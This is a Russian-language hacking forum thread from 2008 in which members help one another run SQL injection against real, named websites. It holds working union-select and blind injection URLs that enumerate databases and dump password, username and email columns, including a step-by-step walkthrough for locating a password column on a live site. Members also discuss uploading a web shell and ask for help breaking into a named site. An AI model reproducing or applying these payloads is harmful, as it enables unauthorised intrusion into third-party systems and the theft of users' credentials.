SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. NetSky
    NetSky Guest
    Кароче, есть доступ к пхпмайадмин, есть возможность залить шелл, но я не знаю полного пути на сервере, к примеру к папке site.xz/project/ ну это понятно...
    Как можно узнать полный путь? Скули там нет, т.к. всего одна фильтрующаяся переменная, пхп инж и т.д. тоже... Доступ к пхп майадмин ограниченный, но прав на создание файла и таблиц - хватает, я проверял скл-запросами, что делать?
     
    15 сен 2008
  2. Хел
    Хел Guest
    r3ddy,
    не факт что будет доступна запись в корень...а так хз...поищи сайты через реверс авось там полный путь будет. Или еще лучше погугли типа site:site.com error
    ну в таком духе..четкого шаблона увы нет.
     
    16 сен 2008
  3. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    r3ddy

    _http://www.xaker.name/forvb/showthread.php?t=10963
     
    16 сен 2008
  4. xeran
    xeran Guest
    Тут гуглил product_details.php
    Нашел такую штучку
    Код:
    http://www.galleongps.com/product_details.php?id=19+order+by+4/*
    А если так
    Код:
    http://www.galleongps.com/product_details.php?id=19+union+select+1,2,3,4/*
    то пишет что не правильно подобраны столбцы.
     
    17 сен 2008
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    xeran,
    мб фильтр на юнион селект стоит..
     
    17 сен 2008
  6. xeran
    xeran Guest
    Я думаю это своеобразная защита от хакеров))
     
    18 сен 2008
  7. nd2k
    nd2k Продвинутый
    Симпатии:
    6
    и вот так тоже фигня какаято
    _http://site.lookmy.info/index.php?id=900&show=news&newsid=-2721+union+select+0x76657273696F6E2829,2,3
     
    18 сен 2008
  8. Хел
    Хел Guest
    nd2k,
    Код:
    http://site.lookmy.info/index.php?id=900&show=news&newsid=-2721+union+select+0x76657273696F6E2829,2,3
    
    так ты выводиш текстовую строку а не результат выполнения функции
    потому что в скрипте используется переменная и запрос несколько раз и соответственно в случае если ты подобрал в первом запросе кол-во столбцов то во втором будет другое и уже там выводится ошибка....тут только посимвольный брут использовать, заюзай VCBrute, ты уже умееш.
    Код:
    http://www.galleongps.com/product_details.php?id=19+and+ascii(lower(substring((version()),1,1)))=53
    
     
    19 сен 2008
  9. seven
    seven Guest
    парни помогите разобраться
    Код:
    _http://www.linspire.com/linspire_letter_archives.php?id=-99999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4+FROM+INFORMATION_SCHEMA.TABLES/*
    вобщем объясню пошагово свою проблему может я что-нибудь не то делаю
    нахожу таблицу users
    Код:
    _http://www.linspire.com/linspire_letter_archives.php?id=-99999+union+select+1,COLUMN_NAME,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+LIMIT+1,1/*
    подбираю колонки password,serialnumber,username,email и тут выдает ошибку
    Код:
    _http://www.linspire.com/linspire_letter_archives.php?id=-99999+union+select+1,concat_ws(0x3b,password,username,email),3,4+FROM+users/*
    пробовал за место users на конце ставить mysql.user тоже самое пишет: Fatal error: Call to undefined method DB_Error::fetchRow() in /linspire/trunk/public/linspire.com/www/htdocs/linspire_letter_archives.php on line 119
     
    20 сен 2008
  10. Хел
    Хел Guest
    seven,
    ну во первых в таблице mysql.user нету колонки username а есть user. Во вторых к таблице mysql.user скорее всего запрещен доступ. В третьих возможно users лежит в другой бд отличной от бд к которой подключен скрипт.
     
    Последнее редактирование модератором: 20 сен 2008
    20 сен 2008
    1 человеку нравится это.
  11. xeran
    xeran Guest
    seven,
    Узер лежит в surfsafe
    Код:
    http://www.linspire.com/linspire_letter_archives.php?id=-99999+union+select+1,concat_ws(0x3b,password,user_id,signup_date),3,4+FROM+surfsafe.users/* 
    а вот узернаме, сериал намбер и емайл по моему мнению запрещены для чтения.
     
    20 сен 2008
    1 человеку нравится это.
  12. NetSky
    NetSky Guest
    Код:
    http://pattaya.regents-school.com/ptyregentsengine/
    Кто-нибудь знает что за двиг? На сайте нашел слепую скуль, кое-что вывел, нужны названия таблиц... Стандартные не подошли, тут либо префикс либо хз, чтото мудрёное. Т.к. двиг похож на паблик (не самописный во всяком случае), хотелось бы найти чтото по нему, я сам ничего не нашел...

    Вот в исходном коде, но двига я такого не нашел нигде, а офф. сайт не пашет...
    Код:
    <title>Ideals Engine (Content Management Advisor.)</title>
    Добавлено через 10 часов 38 минут

    Вывел дб "regents_engine"
    Мб это какойто их двиг? Остается подобрать таблы, префикс может быть типа "re_",
    "regents_" ? Сча попробую погадать с этим.

    -----------------------------------------------------------------------------------

    Добавлено через 11 часов 41 минуту

    Если запрос не объединять юнионом, к примеру
    Код:
    =2+and+ascii(lower(substring((version()),1,1)))=4
    Версию вывести удалось и т.д.
    Но если подставить
    Код:
    =2+and+ascii(lower(substring((version()),1,1)))=4+from+users
    Даже если таблица users существует, все равно будет ошибка? Т.к. нужен юнион? Или я ошибаюсь?
     
    Последнее редактирование модератором: 28 сен 2008
    28 сен 2008
  13. xeran
    xeran Guest
    тыкните носом в вывод.
    Код:
    http://www.echelonmagazine.com/index.php?id=-361+union+select+1,2,3,4,5,6,7,8,9--
    или опять с запросом ошибся?

    З.ы. Сильно не тыкать)
     
    9 окт 2008
  14. NetSky
    NetSky Guest
    Там вывода и нет... :cool_guy:
    Во первых колонок там 10 а не 9, во вторых при использовании юниюна происходит редирект на главную страничку... Видимо стоит фильтрация.
    Попробуй в юнион подставить любое другое кол-во столбцов ошибки нет, тотже редирект, значит сервер не воспринимает этот запрос... Так что вот так вот.
     
    9 окт 2008
  15. zlilo
    zlilo Новичок
    Симпатии:
    0
    l2name.ru нужна помощь. Стоит dle:sad:
     
    16 окт 2008
  16. NetSky
    NetSky Guest
    Ну то что дле, это понятно... Ты хочешь чтоб тебе в ней чтоль персонально уязвимости искали? Ищи сплоиты если версия не последняя, побруть мыло админское, как чтото найдешь обращайся за помощью в реализации, но вот так вот просить о взломе, имхо верх наглости. И при чем тут тема скл-непохек?!
     
    16 окт 2008
  17. Hookman
    Hookman Guest
    _http://www.riptopia.com/news.php?id=30'+UNION+SELECT+1,2,CHARACTER_SET_NAME,4,5,6+FROM+CHARACTER_SETS+LIMIT+1,1/*
    название таблицы и колонки нашёл, но выдаёт ошибку, я в этом новичёк подскажите что здесь не так...
     
    29 окт 2008
  18. NetSky
    NetSky Guest
    Ну во-первых парень, я тебе скажу что ты аццке жжешь! На кой тебе колонка CHARACTER_SET_NAME из таблицы CHARACTER_SETS, объясни мне?
    Сейчас гляну что там с твоим сайтом можно зделать, а тебе бы лучше пойти факи почитать... Я отпишусь об успехах... Вас, молодой человек, попрошу сюда:
    https://xaker.name/forvb/showthread.php?t=4675
    https://xaker.name/forvb/showthread.php?t=6950
    https://xaker.name/forvb/showthread.php?t=6146
    https://xaker.name/forvb/showthread.php?t=4

    Добавлено через 18 минут
    Код:
    http://www.riptopia.com/news.php?id=-30'+UNION+SELECT+1,2,table_name,4,5,6+from+information_schema.tables+limit+33,1/*
    По именам ничего интересного нет, в смысле что таблицы названы неординарно... Первые я пролистнул, там вроде точно ничего интересного, а вот с 33-й по 42-ю гдето начинаются таблы со странным названием, но одинаковым "корнем", выводишь таблу приведенным мной запросом, потом формируешь вот такой:
    Код:
    http://www.riptopia.com/news.php?id=-30'+UNION+SELECT+1,2,column_name,4,5,6+from+information_schema.columns+where+table_name+like+'твоя_табла_выведенная_предыдущим_запросом'+and+column_name+like+'%pass%'/*
    Таким образом, можешь повыводить таблицы первым запросом, с 33-й по 42-ю, после подставляя каждую из таблиц попытаться найти в ней колонку содержащую пароль (вторым запросом) и если таковая будет то ты увидишь в выводе колонку с этой таблы содержащую слово "pass". Если таковую увидишь, то запомни таблу которую подставлял и поочередно, лимитом выводи остальные колонки:
    Код:
    http://www.riptopia.com/news.php?id=-30'+UNION+SELECT+1,2,column_name,4,5,6+from+information_schema.columns+where+table_name+like+'твоя_табла_содержащая_pass'+limit+0,1/*
    Удачи!
     
    Последнее редактирование модератором: 29 окт 2008
    29 окт 2008
    1 человеку нравится это.
  19. Hookman
    Hookman Guest
    NetSky, спасибо за помощь, в таблицах ничего не нашёл(в таблицах с корнем 'test'
    есть параметры object_id object_title, и то я так понял они пустые или я что не то намудрил) есть вопросс: к примеру на сайте_http://*****/news.php?id=1' при таком запроссе выдаёт ошибку Msql_fetch_array...... это ведь ещё не факт что есть уязвимость? И ещё, есть ли ограничение количества полей? При запроссе Group by
    не выдаёт ошибки unknown column, a туже самую Msql_fetch_array.... тоесть таким образом нельзя определить количество полей, через Union набрирал до 20, ошибка всё ещё выскакивает...а дальше набирать можно и три дня....
     
    30 окт 2008
  20. xeran
    xeran Guest
    Толи я с бодуна, толи тут и правда хрень написана.
    Ты хотяб фак читал по скулям? Там вроде все написано. Не обязаельно в каждой базе будет выдавать не верная чило колонок. Тебе надо найти число колонок при котором ошибки вообще не будет. Это будет верное их количество.
    При соединяюсь к просьбе NetSky. Читай фак.(там все подробно написано)

    Код:
    https://xaker.name/forvb/showthread.php?t=4675
    https://xaker.name/forvb/showthread.php?t=6950
    https://xaker.name/forvb/showthread.php?t=6146
    https://xaker.name/forvb/showthread.php?t=4
    Или в школе вы чтение еще не проходили?


    З.ы. и вообще Хел писал, что за вопросы по теории в этой теме, будет бан ))
     
    Последнее редактирование модератором: 30 окт 2008
    30 окт 2008
Загрузка...